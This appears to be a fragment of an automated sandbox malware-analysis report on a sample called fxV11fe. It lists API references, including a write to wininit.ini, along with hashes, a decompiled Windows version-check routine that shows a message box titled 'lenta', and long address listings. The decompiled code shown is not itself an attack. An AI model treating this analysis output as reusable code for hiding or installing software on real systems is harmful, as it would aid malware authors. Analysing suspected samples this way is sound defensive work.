                                                                                                                                                                                                                                            • WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,?), ref: 00A0252C
                                                                                                                                                                                                                                            • _lopen.KERNEL32 ref: 00A0253B
                                                                                                                                                                                                                                            • _llseek.KERNEL32(00000000,00000000,00000002), ref: 00A0254C
                                                                                                                                                                                                                                            • _lclose.KERNEL32(00000000), ref: 00A02555
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.419124794.0000000000A01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419111346.0000000000A00000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419141222.0000000000A08000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419172416.0000000000A0A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419172416.0000000000A0C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_a00000_fxV11fe.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: DirectoryPrivateProfileStringWindowsWrite_lclose_llseek_lopen
                                                                                                                                                                                                                                            • String ID: wininit.ini
                                                                                                                                                                                                                                            • API String ID: 3273605193-4206010578
                                                                                                                                                                                                                                            • Opcode ID: 0cffc04c56e936b306684f15829f59a316d5063054dfa580228e8d53b2569b1a
                                                                                                                                                                                                                                            • Instruction ID: d79ab5d5c74a27b69755410f0bc68a795eb2e35e3be0eb18f7e595fcf73acc8e
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0cffc04c56e936b306684f15829f59a316d5063054dfa580228e8d53b2569b1a
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 54019E32A0022C6BD720DFA5AC0CEDBBB7CEB95760F000165FA49D3190DA749E478AA5
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 75%
                                                                                                                                                                                                                                            			E00A036EE(CHAR* __ecx) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v268;
                                                                                                                                                                                                                                            				struct _OSVERSIONINFOA _v416;
                                                                                                                                                                                                                                            				signed int _v420;
                                                                                                                                                                                                                                            				signed int _v424;
                                                                                                                                                                                                                                            				CHAR* _v428;
                                                                                                                                                                                                                                            				CHAR* _v432;
                                                                                                                                                                                                                                            				signed int _v436;
                                                                                                                                                                                                                                            				CHAR* _v440;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t72;
                                                                                                                                                                                                                                            				CHAR* _t77;
                                                                                                                                                                                                                                            				CHAR* _t91;
                                                                                                                                                                                                                                            				CHAR* _t94;
                                                                                                                                                                                                                                            				int _t97;
                                                                                                                                                                                                                                            				CHAR* _t98;
                                                                                                                                                                                                                                            				signed char _t99;
                                                                                                                                                                                                                                            				CHAR* _t104;
                                                                                                                                                                                                                                            				signed short _t107;
                                                                                                                                                                                                                                            				signed int _t109;
                                                                                                                                                                                                                                            				short _t113;
                                                                                                                                                                                                                                            				void* _t114;
                                                                                                                                                                                                                                            				signed char _t115;
                                                                                                                                                                                                                                            				short _t119;
                                                                                                                                                                                                                                            				CHAR* _t123;
                                                                                                                                                                                                                                            				CHAR* _t124;
                                                                                                                                                                                                                                            				CHAR* _t129;
                                                                                                                                                                                                                                            				signed int _t131;
                                                                                                                                                                                                                                            				signed int _t132;
                                                                                                                                                                                                                                            				CHAR* _t135;
                                                                                                                                                                                                                                            				CHAR* _t138;
                                                                                                                                                                                                                                            				signed int _t139;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t72 =  *0xa08004; // 0xe10713fe
                                                                                                                                                                                                                                            				_v8 = _t72 ^ _t139;
                                                                                                                                                                                                                                            				_v416.dwOSVersionInfoSize = 0x94;
                                                                                                                                                                                                                                            				_t115 = __ecx;
                                                                                                                                                                                                                                            				_t135 = 0;
                                                                                                                                                                                                                                            				_v432 = __ecx;
                                                                                                                                                                                                                                            				_t138 = 0;
                                                                                                                                                                                                                                            				if(GetVersionExA( &_v416) != 0) {
                                                                                                                                                                                                                                            					_t133 = _v416.dwMajorVersion;
                                                                                                                                                                                                                                            					_t119 = 2;
                                                                                                                                                                                                                                            					_t77 = _v416.dwPlatformId - 1;
                                                                                                                                                                                                                                            					__eflags = _t77;
                                                                                                                                                                                                                                            					if(_t77 == 0) {
                                                                                                                                                                                                                                            						_t119 = 0;
                                                                                                                                                                                                                                            						__eflags = 1;
                                                                                                                                                                                                                                            						 *0xa08184 = 1;
                                                                                                                                                                                                                                            						 *0xa08180 = 1;
                                                                                                                                                                                                                                            						L13:
                                                                                                                                                                                                                                            						 *0xa09a40 = _t119;
                                                                                                                                                                                                                                            						L14:
                                                                                                                                                                                                                                            						__eflags =  *0xa08a34 - _t138; // 0x0
                                                                                                                                                                                                                                            						if(__eflags != 0) {
                                                                                                                                                                                                                                            							goto L66;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						__eflags = _t115;
                                                                                                                                                                                                                                            						if(_t115 == 0) {
                                                                                                                                                                                                                                            							goto L66;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_v428 = _t135;
                                                                                                                                                                                                                                            						__eflags = _t119;
                                                                                                                                                                                                                                            						_t115 = _t115 + ((0 | _t119 != 0x00000000) - 0x00000001 & 0x0000003c) + 4;
                                                                                                                                                                                                                                            						_t11 =  &_v420;
                                                                                                                                                                                                                                            						 *_t11 = _v420 & _t138;
                                                                                                                                                                                                                                            						__eflags =  *_t11;
                                                                                                                                                                                                                                            						_v440 = _t115;
                                                                                                                                                                                                                                            						do {
                                                                                                                                                                                                                                            							_v424 = _t135 * 0x18;
                                                                                                                                                                                                                                            							_v436 = E00A02A89(_v416.dwMajorVersion, _v416.dwMinorVersion,  *((intOrPtr*)(_t135 * 0x18 + _t115)),  *((intOrPtr*)(_t135 * 0x18 + _t115 + 4)));
                                                                                                                                                                                                                                            							_t91 = E00A02A89(_v416.dwMajorVersion, _v416.dwMinorVersion,  *((intOrPtr*)(_v424 + _t115 + 0xc)),  *((intOrPtr*)(_v424 + _t115 + 0x10)));
                                                                                                                                                                                                                                            							_t123 = _v436;
                                                                                                                                                                                                                                            							_t133 = 0x54d;
                                                                                                                                                                                                                                            							__eflags = _t123;
                                                                                                                                                                                                                                            							if(_t123 < 0) {
                                                                                                                                                                                                                                            								L32:
                                                                                                                                                                                                                                            								__eflags = _v420 - 1;
                                                                                                                                                                                                                                            								if(_v420 == 1) {
                                                                                                                                                                                                                                            									_t138 = 0x54c;
                                                                                                                                                                                                                                            									L36:
                                                                                                                                                                                                                                            									__eflags = _t138;
                                                                                                                                                                                                                                            									if(_t138 != 0) {
                                                                                                                                                                                                                                            										L40:
                                                                                                                                                                                                                                            										__eflags = _t138 - _t133;
                                                                                                                                                                                                                                            										if(_t138 == _t133) {
                                                                                                                                                                                                                                            											L30:
                                                                                                                                                                                                                                            											_v420 = _v420 & 0x00000000;
                                                                                                                                                                                                                                            											_t115 = 0;
                                                                                                                                                                                                                                            											_v436 = _v436 & 0x00000000;
                                                                                                                                                                                                                                            											__eflags = _t138 - _t133;
                                                                                                                                                                                                                                            											_t133 = _v432;
                                                                                                                                                                                                                                            											if(__eflags != 0) {
                                                                                                                                                                                                                                            												_t124 = _v440;
                                                                                                                                                                                                                                            											} else {
                                                                                                                                                                                                                                            												_t124 = _t133[0x80] + 0x84 + _t135 * 0x3c + _t133;
                                                                                                                                                                                                                                            												_v420 =  &_v268;
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            											__eflags = _t124;
                                                                                                                                                                                                                                            											if(_t124 == 0) {
                                                                                                                                                                                                                                            												_t135 = _v436;
                                                                                                                                                                                                                                            											} else {
                                                                                                                                                                                                                                            												_t99 = _t124[0x30];
                                                                                                                                                                                                                                            												_t135 = _t124[0x34] + 0x84 + _t133;
                                                                                                                                                                                                                                            												__eflags = _t99 & 0x00000001;
                                                                                                                                                                                                                                            												if((_t99 & 0x00000001) == 0) {
                                                                                                                                                                                                                                            													asm("sbb ebx, ebx");
                                                                                                                                                                                                                                            													_t115 =  ~(_t99 & 2) & 0x00000101;
                                                                                                                                                                                                                                            												} else {
                                                                                                                                                                                                                                            													_t115 = 0x104;
                                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            											__eflags =  *0xa08a38 & 0x00000001;
                                                                                                                                                                                                                                            											if(( *0xa08a38 & 0x00000001) != 0) {
                                                                                                                                                                                                                                            												L64:
                                                                                                                                                                                                                                            												_push(0);
                                                                                                                                                                                                                                            												_push(0x30);
                                                                                                                                                                                                                                            												_push(_v420);
                                                                                                                                                                                                                                            												_push("lenta");
                                                                                                                                                                                                                                            												goto L65;
                                                                                                                                                                                                                                            											} else {
                                                                                                                                                                                                                                            												__eflags = _t135;
                                                                                                                                                                                                                                            												if(_t135 == 0) {
                                                                                                                                                                                                                                            													goto L64;
                                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                                            												__eflags =  *_t135;
                                                                                                                                                                                                                                            												if( *_t135 == 0) {
                                                                                                                                                                                                                                            													goto L64;
                                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                                            												MessageBeep(0);
                                                                                                                                                                                                                                            												_t94 = E00A0681F(_t115);
                                                                                                                                                                                                                                            												__eflags = _t94;
                                                                                                                                                                                                                                            												if(_t94 == 0) {
                                                                                                                                                                                                                                            													L57:
                                                                                                                                                                                                                                            													0x180030 = 0x30;
                                                                                                                                                                                                                                            													L58:
                                                                                                                                                                                                                                            													_t97 = MessageBoxA(0, _t135, "lenta", 0x00180030 | _t115);
                                                                                                                                                                                                                                            													__eflags = _t115 & 0x00000004;
                                                                                                                                                                                                                                            													if((_t115 & 0x00000004) == 0) {
                                                                                                                                                                                                                                            														__eflags = _t115 & 0x00000001;
                                                                                                                                                                                                                                            														if((_t115 & 0x00000001) == 0) {
                                                                                                                                                                                                                                            															goto L66;
                                                                                                                                                                                                                                            														}
                                                                                                                                                                                                                                            														__eflags = _t97 - 1;
                                                                                                                                                                                                                                            														L62:
                                                                                                                                                                                                                                            														if(__eflags == 0) {
                                                                                                                                                                                                                                            															_t138 = 0;
                                                                                                                                                                                                                                            														}
                                                                                                                                                                                                                                            														goto L66;
                                                                                                                                                                                                                                            													}
                                                                                                                                                                                                                                            													__eflags = _t97 - 6;
                                                                                                                                                                                                                                            													goto L62;
                                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                                            												_t98 = E00A067C9(_t124, _t124);
                                                                                                                                                                                                                                            												__eflags = _t98;
                                                                                                                                                                                                                                            												if(_t98 == 0) {
                                                                                                                                                                                                                                            													goto L57;
                                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                                            												goto L58;
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            										__eflags = _t138 - 0x54c;
                                                                                                                                                                                                                                            										if(_t138 == 0x54c) {
                                                                                                                                                                                                                                            											goto L30;
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            										__eflags = _t138;
                                                                                                                                                                                                                                            										if(_t138 == 0) {
                                                                                                                                                                                                                                            											goto L66;
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            										_t135 = 0;
                                                                                                                                                                                                                                            										__eflags = 0;
                                                                                                                                                                                                                                            										goto L44;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            									L37:
                                                                                                                                                                                                                                            									_t129 = _v432;
                                                                                                                                                                                                                                            									__eflags = _t129[0x7c];
                                                                                                                                                                                                                                            									if(_t129[0x7c] == 0) {
                                                                                                                                                                                                                                            										goto L66;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            									_t133 =  &_v268;
                                                                                                                                                                                                                                            									_t104 = E00A028E8(_t129,  &_v268, _t129,  &_v428);
                                                                                                                                                                                                                                            									__eflags = _t104;
                                                                                                                                                                                                                                            									if(_t104 != 0) {
                                                                                                                                                                                                                                            										goto L66;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            									_t135 = _v428;
                                                                                                                                                                                                                                            									_t133 = 0x54d;
                                                                                                                                                                                                                                            									_t138 = 0x54d;
                                                                                                                                                                                                                                            									goto L40;
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            								goto L33;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							__eflags = _t91;
                                                                                                                                                                                                                                            							if(_t91 > 0) {
                                                                                                                                                                                                                                            								goto L32;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							__eflags = _t123;
                                                                                                                                                                                                                                            							if(_t123 != 0) {
                                                                                                                                                                                                                                            								__eflags = _t91;
                                                                                                                                                                                                                                            								if(_t91 != 0) {
                                                                                                                                                                                                                                            									goto L37;
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            								__eflags = (_v416.dwBuildNumber & 0x0000ffff) -  *((intOrPtr*)(_v424 + _t115 + 0x14));
                                                                                                                                                                                                                                            								L27:
                                                                                                                                                                                                                                            								if(__eflags <= 0) {
                                                                                                                                                                                                                                            									goto L37;
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            								L28:
                                                                                                                                                                                                                                            								__eflags = _t135;
                                                                                                                                                                                                                                            								if(_t135 == 0) {
                                                                                                                                                                                                                                            									goto L33;
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            								_t138 = 0x54c;
                                                                                                                                                                                                                                            								goto L30;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							__eflags = _t91;
                                                                                                                                                                                                                                            							_t107 = _v416.dwBuildNumber;
                                                                                                                                                                                                                                            							if(_t91 != 0) {
                                                                                                                                                                                                                                            								_t131 = _v424;
                                                                                                                                                                                                                                            								__eflags = (_t107 & 0x0000ffff) -  *((intOrPtr*)(_t131 + _t115 + 8));
                                                                                                                                                                                                                                            								if((_t107 & 0x0000ffff) >=  *((intOrPtr*)(_t131 + _t115 + 8))) {
                                                                                                                                                                                                                                            									goto L37;
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            								goto L28;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							_t132 = _t107 & 0x0000ffff;
                                                                                                                                                                                                                                            							_t109 = _v424;
                                                                                                                                                                                                                                            							__eflags = _t132 -  *((intOrPtr*)(_t109 + _t115 + 8));
                                                                                                                                                                                                                                            							if(_t132 <  *((intOrPtr*)(_t109 + _t115 + 8))) {
                                                                                                                                                                                                                                            								goto L28;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							__eflags = _t132 -  *((intOrPtr*)(_t109 + _t115 + 0x14));
                                                                                                                                                                                                                                            							goto L27;
                                                                                                                                                                                                                                            							L33:
                                                                                                                                                                                                                                            							_t135 =  &(_t135[1]);
                                                                                                                                                                                                                                            							_v428 = _t135;
                                                                                                                                                                                                                                            							_v420 = _t135;
                                                                                                                                                                                                                                            							__eflags = _t135 - 2;
                                                                                                                                                                                                                                            						} while (_t135 < 2);
                                                                                                                                                                                                                                            						goto L36;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					__eflags = _t77 == 1;
                                                                                                                                                                                                                                            					if(_t77 == 1) {
                                                                                                                                                                                                                                            						 *0xa09a40 = _t119;
                                                                                                                                                                                                                                            						 *0xa08184 = 1;
                                                                                                                                                                                                                                            						 *0xa08180 = 1;
                                                                                                                                                                                                                                            						__eflags = _t133 - 3;
                                                                                                                                                                                                                                            						if(_t133 > 3) {
                                                                                                                                                                                                                                            							__eflags = _t133 - 5;
                                                                                                                                                                                                                                            							if(_t133 < 5) {
                                                                                                                                                                                                                                            								goto L14;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							_t113 = 3;
                                                                                                                                                                                                                                            							_t119 = _t113;
                                                                                                                                                                                                                                            							goto L13;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t119 = 1;
                                                                                                                                                                                                                                            						_t114 = 3;
                                                                                                                                                                                                                                            						 *0xa09a40 = 1;
                                                                                                                                                                                                                                            						__eflags = _t133 - _t114;
                                                                                                                                                                                                                                            						if(__eflags < 0) {
                                                                                                                                                                                                                                            							L9:
                                                                                                                                                                                                                                            							 *0xa08184 = _t135;
                                                                                                                                                                                                                                            							 *0xa08180 = _t135;
                                                                                                                                                                                                                                            							goto L14;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						if(__eflags != 0) {
                                                                                                                                                                                                                                            							goto L14;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						__eflags = _v416.dwMinorVersion - 0x33;
                                                                                                                                                                                                                                            						if(_v416.dwMinorVersion >= 0x33) {
                                                                                                                                                                                                                                            							goto L14;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						goto L9;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					_t138 = 0x4ca;
                                                                                                                                                                                                                                            					goto L44;
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					_t138 = 0x4b4;
                                                                                                                                                                                                                                            					L44:
                                                                                                                                                                                                                                            					_push(_t135);
                                                                                                                                                                                                                                            					_push(0x10);
                                                                                                                                                                                                                                            					_push(_t135);
                                                                                                                                                                                                                                            					_push(_t135);
                                                                                                                                                                                                                                            					L65:
                                                                                                                                                                                                                                            					_t133 = _t138;
                                                                                                                                                                                                                                            					E00A044B9(0, _t138);
                                                                                                                                                                                                                                            					L66:
                                                                                                                                                                                                                                            					return E00A06CE0(0 | _t138 == 0x00000000, _t115, _v8 ^ _t139, _t133, _t135, _t138);
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            			}





































                                                                                                                                                                                                                                            0x00a036f9
                                                                                                                                                                                                                                            0x00a03700
                                                                                                                                                                                                                                            0x00a0370c
                                                                                                                                                                                                                                            0x00a03716
                                                                                                                                                                                                                                            0x00a03718
                                                                                                                                                                                                                                            0x00a0371b
                                                                                                                                                                                                                                            0x00a03721
                                                                                                                                                                                                                                            0x00a0372b
                                                                                                                                                                                                                                            0x00a0373d
                                                                                                                                                                                                                                            0x00a03745
                                                                                                                                                                                                                                            0x00a03746
                                                                                                                                                                                                                                            0x00a03746
                                                                                                                                                                                                                                            0x00a03749
                                                                                                                                                                                                                                            0x00a037ab
                                                                                                                                                                                                                                            0x00a037ad
                                                                                                                                                                                                                                            0x00a037ae
                                                                                                                                                                                                                                            0x00a037b3
                                                                                                                                                                                                                                            0x00a037b8
                                                                                                                                                                                                                                            0x00a037b8
                                                                                                                                                                                                                                            0x00a037bf
                                                                                                                                                                                                                                            0x00a037bf
                                                                                                                                                                                                                                            0x00a037c5
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a037cb
                                                                                                                                                                                                                                            0x00a037cd
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a037d5
                                                                                                                                                                                                                                            0x00a037db
                                                                                                                                                                                                                                            0x00a037e8
                                                                                                                                                                                                                                            0x00a037ea
                                                                                                                                                                                                                                            0x00a037ea
                                                                                                                                                                                                                                            0x00a037ea
                                                                                                                                                                                                                                            0x00a037f0
                                                                                                                                                                                                                                            0x00a037f6
                                                                                                                                                                                                                                            0x00a03805
                                                                                                                                                                                                                                            0x00a03817
                                                                                                                                                                                                                                            0x00a0382b
                                                                                                                                                                                                                                            0x00a03830
                                                                                                                                                                                                                                            0x00a03836
                                                                                                                                                                                                                                            0x00a0383b
                                                                                                                                                                                                                                            0x00a0383d
                                                                                                                                                                                                                                            0x00a038eb
                                                                                                                                                                                                                                            0x00a038eb
                                                                                                                                                                                                                                            0x00a038f2
                                                                                                                                                                                                                                            0x00a0390c
                                                                                                                                                                                                                                            0x00a03911
                                                                                                                                                                                                                                            0x00a03911
                                                                                                                                                                                                                                            0x00a03913
                                                                                                                                                                                                                                            0x00a0394d
                                                                                                                                                                                                                                            0x00a0394d
                                                                                                                                                                                                                                            0x00a0394f
                                                                                                                                                                                                                                            0x00a038a9
                                                                                                                                                                                                                                            0x00a038a9
                                                                                                                                                                                                                                            0x00a038b0
                                                                                                                                                                                                                                            0x00a038b2
                                                                                                                                                                                                                                            0x00a038b9
                                                                                                                                                                                                                                            0x00a038bb
                                                                                                                                                                                                                                            0x00a038c1
                                                                                                                                                                                                                                            0x00a03975
                                                                                                                                                                                                                                            0x00a038c7
                                                                                                                                                                                                                                            0x00a038de
                                                                                                                                                                                                                                            0x00a038e0
                                                                                                                                                                                                                                            0x00a038e0
                                                                                                                                                                                                                                            0x00a0397b
                                                                                                                                                                                                                                            0x00a0397d
                                                                                                                                                                                                                                            0x00a039a9
                                                                                                                                                                                                                                            0x00a0397f
                                                                                                                                                                                                                                            0x00a03982
                                                                                                                                                                                                                                            0x00a0398b
                                                                                                                                                                                                                                            0x00a0398d
                                                                                                                                                                                                                                            0x00a0398f
                                                                                                                                                                                                                                            0x00a0399f
                                                                                                                                                                                                                                            0x00a039a1
                                                                                                                                                                                                                                            0x00a03991
                                                                                                                                                                                                                                            0x00a03991
                                                                                                                                                                                                                                            0x00a03991
                                                                                                                                                                                                                                            0x00a0398f
                                                                                                                                                                                                                                            0x00a039af
                                                                                                                                                                                                                                            0x00a039b6
                                                                                                                                                                                                                                            0x00a03a0f
                                                                                                                                                                                                                                            0x00a03a0f
                                                                                                                                                                                                                                            0x00a03a11
                                                                                                                                                                                                                                            0x00a03a13
                                                                                                                                                                                                                                            0x00a03a19
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a039b8
                                                                                                                                                                                                                                            0x00a039b8
                                                                                                                                                                                                                                            0x00a039ba
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a039bc
                                                                                                                                                                                                                                            0x00a039bf
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a039c3
                                                                                                                                                                                                                                            0x00a039c9
                                                                                                                                                                                                                                            0x00a039ce
                                                                                                                                                                                                                                            0x00a039d0
                                                                                                                                                                                                                                            0x00a039e3
                                                                                                                                                                                                                                            0x00a039e5
                                                                                                                                                                                                                                            0x00a039e6
                                                                                                                                                                                                                                            0x00a039f1
                                                                                                                                                                                                                                            0x00a039f7
                                                                                                                                                                                                                                            0x00a039fa
                                                                                                                                                                                                                                            0x00a03a01
                                                                                                                                                                                                                                            0x00a03a04
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a03a06
                                                                                                                                                                                                                                            0x00a03a09
                                                                                                                                                                                                                                            0x00a03a09
                                                                                                                                                                                                                                            0x00a03a0b
                                                                                                                                                                                                                                            0x00a03a0b
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a03a09
                                                                                                                                                                                                                                            0x00a039fc
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a039fc
                                                                                                                                                                                                                                            0x00a039d3
                                                                                                                                                                                                                                            0x00a039d8
                                                                                                                                                                                                                                            0x00a039da
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a039dc
                                                                                                                                                                                                                                            0x00a039b6
                                                                                                                                                                                                                                            0x00a03955
                                                                                                                                                                                                                                            0x00a0395b
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a03961
                                                                                                                                                                                                                                            0x00a03963
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a03969
                                                                                                                                                                                                                                            0x00a03969
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a03969
                                                                                                                                                                                                                                            0x00a03915
                                                                                                                                                                                                                                            0x00a03915
                                                                                                                                                                                                                                            0x00a0391b
                                                                                                                                                                                                                                            0x00a0391f
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a0392d
                                                                                                                                                                                                                                            0x00a03933
                                                                                                                                                                                                                                            0x00a03938
                                                                                                                                                                                                                                            0x00a0393a
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a03940
                                                                                                                                                                                                                                            0x00a03946
                                                                                                                                                                                                                                            0x00a0394b
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a0394b
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a038f2
                                                                                                                                                                                                                                            0x00a03843
                                                                                                                                                                                                                                            0x00a03845
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a0384b
                                                                                                                                                                                                                                            0x00a0384d
                                                                                                                                                                                                                                            0x00a03883
                                                                                                                                                                                                                                            0x00a03885
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a0389a
                                                                                                                                                                                                                                            0x00a0389e
                                                                                                                                                                                                                                            0x00a0389e
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a038a0
                                                                                                                                                                                                                                            0x00a038a0
                                                                                                                                                                                                                                            0x00a038a2
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a038a4
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a038a4
                                                                                                                                                                                                                                            0x00a0384f
                                                                                                                                                                                                                                            0x00a03851
                                                                                                                                                                                                                                            0x00a03857
                                                                                                                                                                                                                                            0x00a0386e
                                                                                                                                                                                                                                            0x00a03877
                                                                                                                                                                                                                                            0x00a0387b
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a03881
                                                                                                                                                                                                                                            0x00a03859
                                                                                                                                                                                                                                            0x00a0385c
                                                                                                                                                                                                                                            0x00a03862
                                                                                                                                                                                                                                            0x00a03866
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a03868
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a038f4
                                                                                                                                                                                                                                            0x00a038f4
                                                                                                                                                                                                                                            0x00a038f5
                                                                                                                                                                                                                                            0x00a038fb
                                                                                                                                                                                                                                            0x00a03901
                                                                                                                                                                                                                                            0x00a03901
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a0390a
                                                                                                                                                                                                                                            0x00a0374b
                                                                                                                                                                                                                                            0x00a0374e
                                                                                                                                                                                                                                            0x00a0375c
                                                                                                                                                                                                                                            0x00a03764
                                                                                                                                                                                                                                            0x00a03769
                                                                                                                                                                                                                                            0x00a0376e
                                                                                                                                                                                                                                            0x00a03771
                                                                                                                                                                                                                                            0x00a0379c
                                                                                                                                                                                                                                            0x00a0379f
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a037a3
                                                                                                                                                                                                                                            0x00a037a4
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a037a4
                                                                                                                                                                                                                                            0x00a03773
                                                                                                                                                                                                                                            0x00a03777
                                                                                                                                                                                                                                            0x00a03778
                                                                                                                                                                                                                                            0x00a0377f
                                                                                                                                                                                                                                            0x00a03781
                                                                                                                                                                                                                                            0x00a0378e
                                                                                                                                                                                                                                            0x00a0378e
                                                                                                                                                                                                                                            0x00a03794
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a03794
                                                                                                                                                                                                                                            0x00a03783
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a03785
                                                                                                                                                                                                                                            0x00a0378c
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a0378c
                                                                                                                                                                                                                                            0x00a03750
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a0372d
                                                                                                                                                                                                                                            0x00a0372d
                                                                                                                                                                                                                                            0x00a0396b
                                                                                                                                                                                                                                            0x00a0396b
                                                                                                                                                                                                                                            0x00a0396c
                                                                                                                                                                                                                                            0x00a0396e
                                                                                                                                                                                                                                            0x00a0396f
                                                                                                                                                                                                                                            0x00a03a1e
                                                                                                                                                                                                                                            0x00a03a1e
                                                                                                                                                                                                                                            0x00a03a22
                                                                                                                                                                                                                                            0x00a03a27
                                                                                                                                                                                                                                            0x00a03a3e
                                                                                                                                                                                                                                            0x00a03a3e

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetVersionExA.KERNEL32(?,00000000,?,?), ref: 00A03723
